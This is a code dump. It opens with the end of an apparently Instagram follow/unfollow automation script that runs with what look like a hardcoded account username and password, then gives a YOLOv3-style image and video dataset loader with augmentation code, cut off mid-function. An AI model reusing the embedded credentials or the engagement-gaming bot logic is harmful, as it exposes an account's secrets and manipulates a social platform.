#print("CTRL + C to cancel this operation or wait 30 seconds to start")
#time.sleep(30)
if mode == 0:
bot.new_auto_mod()
elif mode == 1:
check_status(bot)
while bot.self_following - bot.self_follower > 200:
unfollow_protocol(bot)
time.sleep(10 * 60)
check_status(bot)
while bot.self_following - bot.self_follower < 400:
while len(bot.user_info_list) < 50:
feed_scanner(bot)
time.sleep(5 * 60)
follow_protocol(bot)
time.sleep(10 * 60)
check_status(bot)
elif mode == 2:
bot.bot_mode = 1
bot.new_auto_mod()
elif mode == 3:
unfollow_protocol(bot)
time.sleep(10 * 60)
elif mode == 4:
feed_scanner(bot)
time.sleep(60)
follow_protocol(bot)
time.sleep(10 * 60)
elif mode == 5:
bot.bot_mode = 2
unfollow_protocol(bot)
else:
print("Wrong mode!")
p = Pool()
p.starmap(the_bot, [("fntxworld", "coyote311")])
#p = Process(target=the_bot, args=["fntxworld", "coyote311"])
#p.start()
#p.join()
#pool.apply_async(the_bot)
|
datasets.py
|
import glob
import math
import os
import random
import shutil
import time
from pathlib import Path
from threading import Thread
import cv2
import numpy as np
import torch
from PIL import Image, ExifTags
from torch.utils.data import Dataset
from tqdm import tqdm
from utils.utils import xyxy2xywh, xywh2xyxy
img_formats = ['.bmp', '.jpg', '.jpeg', '.png', '.tif']
vid_formats = ['.mov', '.avi', '.mp4']
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except:
pass
return s
class LoadImages: # for inference
def __init__(self, path, img_size=416, half=False):
path = str(Path(path)) # os-agnostic
files = []
if os.path.isdir(path):
files = sorted(glob.glob(os.path.join(path, '*.*')))
elif os.path.isfile(path):
files = [path]
images = [x for x in files if os.path.splitext(x)[-1].lower() in img_formats]
videos = [x for x in files if os.path.splitext(x)[-1].lower() in vid_formats]
nI, nV = len(images), len(videos)
self.img_size = img_size
self.files = images + videos
self.nF = nI + nV # number of files
self.video_flag = [False] * nI + [True] * nV
self.mode = 'images'
self.half = half # half precision fp16 images
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nF > 0, 'No images or videos found in ' + path
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nF:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
if not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nF: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
print('video %g/%g (%g/%g) %s: ' % (self.count + 1, self.nF, self.frame, self.nframes, path), end='')
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, 'Image Not Found ' + path
print('image %g/%g %s: ' % (self.count, self.nF, path), end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Normalize RGB
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
# cv2.imwrite(path + '.letterbox.jpg', 255 * img.transpose((1, 2, 0))[:, :, ::-1]) # save letterbox image
return path, img, img0, self.cap
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.nframes = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nF # number of files
class LoadWebcam: # for inference
def __init__(self, pipe=0, img_size=416, half=False):
self.img_size = img_size
self.half = half # half precision fp16 images
if pipe == '0':
pipe = 0 # local camera
# pipe = 'rtsp://192.168.1.64/1' # IP camera
# pipe = 'rtsp://username:password@192.168.1.64/1' # IP camera with login
# pipe = 'rtsp://170.93.143.139/rtplive/470011e600ef003a004ee33696235daa' # IP traffic camera
# pipe = 'http://wmccpinetop.axiscam.net/mjpg/video.mjpg' # IP golf camera
# https://answers.opencv.org/question/215996/changing-gstreamer-pipeline-to-opencv-in-pythonsolved/
# pipe = '"rtspsrc location="rtsp://username:password@192.168.1.64/1" latency=10 ! appsink' # GStreamer
# https://answers.opencv.org/question/200787/video-acceleration-gstremer-pipeline-in-videocapture/
# https://stackoverflow.com/questions/54095699/install-gstreamer-support-for-opencv-python-package # install help
# pipe = "rtspsrc location=rtsp://root:root@192.168.0.91:554/axis-media/media.amp?videocodec=h264&resolution=3840x2160 protocols=GST_RTSP_LOWER_TRANS_TCP ! rtph264depay ! queue ! vaapih264dec ! videoconvert ! appsink" # GStreamer
self.pipe = pipe
self.cap = cv2.VideoCapture(pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
if self.pipe == 0: # local camera
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
else: # IP camera
n = 0
while True:
n += 1
self.cap.grab()
if n % 30 == 0: # skip frames
ret_val, img0 = self.cap.retrieve()
if ret_val:
break
# Print
assert ret_val, 'Camera Error %s' % self.pipe
img_path = 'webcam.jpg'
print('webcam %g: ' % self.count, end='')
# Padded resize
img = letterbox(img0, new_shape=self.img_size)[0]
# Normalize RGB
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return img_path, img, img0, None
def __len__(self):
return 0
class LoadStreams: # multiple IP or RTSP cameras
def __init__(self, sources='streams.txt', img_size=416, half=False):
self.mode = 'images'
self.img_size = img_size
self.half = half # half precision fp16 images
if os.path.isfile(sources):
with open(sources, 'r') as f:
sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs = [None] * n
self.sources = sources
for i, s in enumerate(sources):
# Start the thread to read frames from the video stream
print('%g/%g: %s... ' % (i + 1, n, s), end='')
cap = cv2.VideoCapture(0 if s == '0' else s)
assert cap.isOpened(), 'Failed to open %s' % s
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) % 100
_, self.imgs[i] = cap.read() # guarantee first frame
thread = Thread(target=self.update, args=([i, cap]), daemon=True)
print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
thread.start()
print('') # newline
def update(self, index, cap):
# Read next stream frame in a daemon thread
n = 0
while cap.isOpened():
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n == 4: # read every 4th frame
_, self.imgs[index] = cap.retrieve()
n = 0
time.sleep(0.01) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
img0 = self.imgs.copy()
if cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img = [letterbox(x, new_shape=self.img_size, interp=cv2.INTER_LINEAR)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Normalize RGB
img = img[:, :, :, ::-1].transpose(0, 3, 1, 2) # BGR to RGB
img = np.ascontiguousarray(img, dtype=np.float16 if self.half else np.float32) # uint8 to fp16/fp32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return self.sources, img, img0, None
def __len__(self):
return 0 # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=True, stride=32.0,image_weights=False,
cache_labels=False, cache_images=False):
path = str(Path(path)) # os-agnostic
with open(path, 'r') as f:
self.img_files = [x.replace('/', os.sep) for x in f.read().splitlines() # os-agnostic
if os.path.splitext(x)[-1].lower() in img_formats]
n = len(self.img_files)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
assert n > 0, 'No images found in %s' % path
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes
sp = 'data' + os.sep + path.replace('.txt', '.shapes').split(os.sep)[-1] # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i]
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride).astype(np.int) * stride
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc='Reading labels')
nm, nf, ne, ns = 0, 0, 0, 0 # number missing, number found, number empty, number datasubset
for i, file in enumerate(pbar):
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w, _ = img.shape
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * np.array([w, h, w, h]) # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # file empty
pbar.desc = 'Reading labels (%g found, %g missing, %g empty for %g images)' % (nf, nm, ne, n)
assert nf > 0, 'No labels found. Recommend correcting image and label paths.'
# Cache images into memory for faster training (~5GB)
if cache_images and augment: # if training
for i in tqdm(range(min(len(self.img_files), 10000)), desc='Reading images'): # max 10k images
img_path = self.img_files[i]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # or INTER_AREA
self.imgs[i] = img
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
mosaic = True and self.augment # load 4 images at a time into a mosaic (only during training)
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
h, w, _ = img.shape
else:
# Load image
img = load_image(self, index)
# Letterbox
h, w, _ = img.shape
if self.rect:
img, ratio, padw, padh = letterbox(img, self.batch_shapes[self.batch[index]], mode='rect')
else:
img, ratio, padw, padh = letterbox(img, self.img_size, mode='square')
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + padh
if self.augment:
# Augment imagespace
g = 0.0 if mosaic else 1.0 # do not augment mosaics
hyp = self.hyp
img, labels = random_affine(img, labels,
degrees=hyp['degrees'] * g,
translate=hyp['translate'] * g,
scale=hyp['scale'] * g,
shear=hyp['shear'] * g)
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Normalize
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return torch.from_numpy(img), labels_out, img_path, (h, w)
@staticmethod
def collate_fn(batch):
img, label, path, hw = list(zip(*batch)) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, hw
class LoadImagesAndLabelsv2(Dataset): # for training/testing
def __init__(self, path, img_size=416, batch_size=16, augment=False, hyp=None, rect=True, stride=32.0,image_weights=False,
cache_labels=False, cache_images=False):
path = str(Path(path)) # os-agnostic
with open(path, 'r') as f:
self.img_files = [x.replace('/', os.sep) for x in f.read().splitlines() # os-agnostic
if os.path.splitext(x)[-1].lower() in img_formats]
n = len(self.img_files)
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
assert n > 0, 'No images found in %s' % path
self.n = n
self.batch = bi # batch index of image
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
# Define labels
self.label_files = [x.replace('images', 'labels').replace(os.path.splitext(x)[-1], '.txt')
for x in self.img_files]
# Rectangular Training https://github.com/ultralytics/yolov3/issues/232
if self.rect:
# Read image shapes
sp = 'data' + os.sep + path.replace('.txt', '.shapes').split(os.sep)[-1] # shapefile path
try:
with open(sp, 'r') as f: # read existing shapefile
s = [x.split() for x in f.read().splitlines()]
assert len(s) == n, 'Shapefile out of sync'
except:
s = [exif_size(Image.open(f)) for f in tqdm(self.img_files, desc='Reading image shapes')]
np.savetxt(sp, s, fmt='%g') # overwrites existing (if any)
# Sort by aspect ratio
s = np.array(s, dtype=np.float64)
ar = s[:, 1] / s[:, 0] # aspect ratio
i = ar.argsort()
self.img_files = [self.img_files[i] for i in i]
self.label_files = [self.label_files[i] for i in i]
self.shapes = s[i]
ar = ar[i]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride).astype(np.int) * stride
# Preload labels (required for weighted CE training)
self.imgs = [None] * n
self.labels = [None] * n
if cache_labels or image_weights: # cache labels for faster training
self.labels = [np.zeros((0, 5))] * n
extract_bounding_boxes = False
create_datasubset = False
pbar = tqdm(self.label_files, desc='Reading labels')
nm, nf, ne, ns = 0, 0, 0, 0 # number missing, number found, number empty, number datasubset
for i, file in enumerate(pbar):
try:
with open(file, 'r') as f:
l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
except:
nm += 1 # print('missing labels for image %s' % self.img_files[i]) # file missing
continue
if l.shape[0]:
assert l.shape[1] == 5, '> 5 label columns: %s' % file
assert (l >= 0).all(), 'negative labels: %s' % file
assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
self.labels[i] = l
nf += 1 # file found
# Create subdataset (a smaller dataset)
if create_datasubset and ns < 1E4:
if ns == 0:
create_folder(path='./datasubset')
os.makedirs('./datasubset/images')
exclude_classes = 43
if exclude_classes not in l[:, 0]:
ns += 1
# shutil.copy(src=self.img_files[i], dst='./datasubset/images/') # copy image
with open('./datasubset/images.txt', 'a') as f:
f.write(self.img_files[i] + '\n')
# Extract object detection boxes for a second stage classifier
if extract_bounding_boxes:
p = Path(self.img_files[i])
img = cv2.imread(str(p))
h, w, _ = img.shape
for j, x in enumerate(l):
f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
if not os.path.exists(Path(f).parent):
os.makedirs(Path(f).parent) # make new output folder
b = x[1:] * np.array([w, h, w, h]) # box
b[2:] = b[2:].max() # rectangle to square
b[2:] = b[2:] * 1.3 + 30 # pad
b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)
b[[0, 2]] = np.clip(b[[0, 2]], 0, w) # clip boxes outside of image
b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
else:
ne += 1 # file empty
pbar.desc = 'Reading labels (%g found, %g missing, %g empty for %g images)' % (nf, nm, ne, n)
assert nf > 0, 'No labels found. Recommend correcting image and label paths.'
# Cache images into memory for faster training (~5GB)
if cache_images and augment: # if training
for i in tqdm(range(min(len(self.img_files), 10000)), desc='Reading images'): # max 10k images
img_path = self.img_files[i]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # or INTER_AREA
self.imgs[i] = img
# Detect corrupted images https://medium.com/joelthchao/programmatically-detect-corrupted-image-8c1b2006c3d3
detect_corrupted_images = False
if detect_corrupted_images:
from skimage import io # conda install -c conda-forge scikit-image
for file in tqdm(self.img_files, desc='Detecting corrupted images'):
try:
_ = io.imread(file)
except:
print('Corrupted image detected: %s' % file)
def __len__(self):
return len(self.img_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
if self.image_weights:
index = self.indices[index]
img_path = self.img_files[index]
label_path = self.label_files[index]
mosaic = True and self.augment # load 4 images at a time into a mosaic (only during training)
if mosaic:
# Load mosaic
img, labels = load_mosaic(self, index)
h, w, _ = img.shape
else:
# Load image
img, (h0, w0), (h, w) = load_imagev2(self, index)
# Letterbox
if self.rect:
img, ratio, padw, padh = letterbox(img, self.batch_shapes[self.batch[index]], mode='rect')
else:
img, ratio, padw, padh = letterbox(img, self.img_size, mode='square')
pad=(padw, padh)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
# Load labels
labels = []
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + padh
if self.augment:
# Augment imagespace
g = 0.0 if mosaic else 1.0 # do not augment mosaics
hyp = self.hyp
img, labels = random_affine(img, labels,
degrees=hyp['degrees'] * g,
translate=hyp['translate'] * g,
scale=hyp['scale'] * g,
shear=hyp['shear'] * g)
# Apply cutouts
# if random.random() < 0.9:
# labels = cutout(img, labels)
nL = len(labels) # number of labels
if nL:
# convert xyxy to xywh
labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])
# Normalize coordinates 0 - 1
labels[:, [2, 4]] /= img.shape[0] # height
labels[:, [1, 3]] /= img.shape[1] # width
if self.augment:
# random left-right flip
lr_flip = True
if lr_flip and random.random() < 0.5:
img = np.fliplr(img)
if nL:
labels[:, 1] = 1 - labels[:, 1]
# random up-down flip
ud_flip = False
if ud_flip and random.random() < 0.5:
img = np.flipud(img)
if nL:
labels[:, 2] = 1 - labels[:, 2]
labels_out = torch.zeros((nL, 6))
if nL:
labels_out[:, 1:] = torch.from_numpy(labels)
# Normalize
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img, dtype=np.float32) # uint8 to float32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
return torch.from_numpy(img), labels_out, img_path, shapes
@staticmethod
def collate_fn(batch):
img, label, path, hw = list(zip(*batch)) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, hw
def load_image(self, index):
# loads 1 image from dataset
img = self.imgs[index]
if img is None:
img_path = self.img_files[index]
img = cv2.imread(img_path) # BGR
assert img is not None, 'Image Not Found ' + img_path
r = self.img_size / max(img.shape) # size ratio
if self.augment and r < 1: # if training (NOT testing), downsize to inference shape
h, w, _ = img.shape
img = cv2.resize(img, (int(w * r), int(h * r)), interpolation=cv2.INTER_LINEAR) # _LINEAR fastest
# Augment colorspace
if self.augment:
augment_hsv(img, hgain=self.hyp['hsv_h'], sgain=self.hyp['hsv_s'], vgain=self.hyp['hsv_v'])
return img
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_imagev2(self, i):
# loads 1 image from dataset index 'i', returns im, original hw, resized hw
im = self.imgs[i]
if im is None: # not cached in ram
path = self.img_files[i]
im = cv2.imread(path) # BGR
assert im is not None, 'Image Not Found ' + path
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im, (int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_AREA if r < 1 and not self.augment else cv2.INTER_LINEAR)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.imgs[i], self.img_hw0[i], self.img_hw[i] # im, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
x = (np.random.uniform(-1, 1, 3) * np.array([hgain, sgain, vgain]) + 1).astype(np.float32) # random gains
img_hsv = (cv2.cvtColor(img, cv2.COLOR_BGR2HSV) * x.reshape((1, 1, 3))).clip(None, 255).astype(np.uint8)
cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
# def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5): # original version
# # SV augmentation by 50%
# img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # hue, sat, val
#
# S = img_hsv[:, :, 1].astype(np.float32) # saturation
# V = img_hsv[:, :, 2].astype(np.float32) # value
#
# a = random.uniform(-1, 1) * sgain + 1
# b = random.uniform(-1, 1) * vgain + 1
# S *= a
# V *= b
#
# img_hsv[:, :, 1] = S if a < 1 else S.clip(None, 255)
# img_hsv[:, :, 2] = V if b < 1 else V.clip(None, 255)
# cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img) # no return needed
def load_mosaic(self, index):
# loads images in a mosaic
labels4 = []
s = self.img_size
xc, yc = [int(random.uniform(s * 0.5, s * 1.5)) for _ in range(2)] # mosaic center x, y
img4 = np.zeros((s * 2, s * 2, 3), dtype=np.uint8) + 128 # base image with 4 tiles
indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)] # 3 additional image indices
for i, index in enumerate(indices):
# Load image
img = load_image(self, index)
h, w, _ = img.shape
# place img in img4
if i == 0: # top left
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, max(xc, w), min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Load labels
label_path = self.label_files[index]
if os.path.isfile(label_path):
x = self.labels[index]
if x is None: # labels not preloaded
with open(label_path, 'r') as f:
x = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)
if x.size > 0:
# Normalized xywh to pixel xyxy format
labels = x.copy()
labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
# else:
# labels = np.zeros((0,5), dtype=np.float32)
labels4.append(labels)
labels4 = np.concatenate(labels4, 0)
# hyp = self.hyp
# img4, labels4 = random_affine(img4, labels4,
# degrees=hyp['degrees'],
# translate=hyp['translate'],
# scale=hyp['scale'],
# shear=hyp['shear'])
# Center crop
a = s // 2
img4 = img4[a:a + s, a:a + s]
labels4[:, 1:] -= a
return img4, labels4
def letterbox(img, new_shape=416, color=(128, 128, 128), mode='auto', interp=cv2.INTER_AREA):
# Resize a rectangular image to a 32 pixel multiple rectangle
# https://github.com/ultralytics/yolov3/issues/232
shape = img.shape[:2] # current shape [height, width]
if isinstance(new_shape, int):
r = float(new_shape) / max(shape) # ratio = new / old
else:
r = max(new_shape) / max(shape)
ratio = r, r # width, height ratios
new_unpad = (int(round(shape[1] * r)), int(round(shape[0] * r)))
# Compute padding https://github.com/ultralytics/yolov3/issues/232
if mode is 'auto': # minimum rectangle
dw = np.mod(new_shape - new_unpad[0], 32) / 2 # width padding
dh = np.mod(new_shape - new_unpad[1], 32) / 2 # height padding
elif mode is 'square': # square
dw = (new_shape - new_unpad[0]) / 2 # width padding
dh = (new_shape - new_unpad[1]) / 2 # height padding
elif mode is 'rect': # square
dw = (new_shape[1] - new_unpad[0]) / 2 # width padding
dh = (new_shape[0] - new_unpad[1]) / 2 # height padding
elif mode is 'scaleFill':
dw, dh = 0.0, 0.0
new_unpad = (new_shape, new_shape)
ratio = new_shape / shape[1], new_shape / shape[0] # width, height ratios
if shape[::-1] != new_unpad: # resize
img = cv2.resize(img, new_unpad, interpolation=interp) # INTER_AREA is better, INTER_LINEAR is faster
top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border
return img, ratio, dw, dh
def random_affine(img, targets=(), degrees=10, translate=.1, scale=.1, shear=10):
# torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(.1, .1), scale=(.9, 1.1), shear=(-10, 10))
# https://medium.com/uruvideo/dataset-augmentation-with-random-homographies-a8f4b44830d4
if targets is None:
targets = []
border = 0 # width of added border (optional)
height = img.shape[0] + border * 2
width = img.shape[1] + border * 2
# Rotation and Scale
R = np.eye(3)
a = random.uniform(-degrees, degrees)
# a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations
s = random.uniform(1 - scale, 1 + scale)
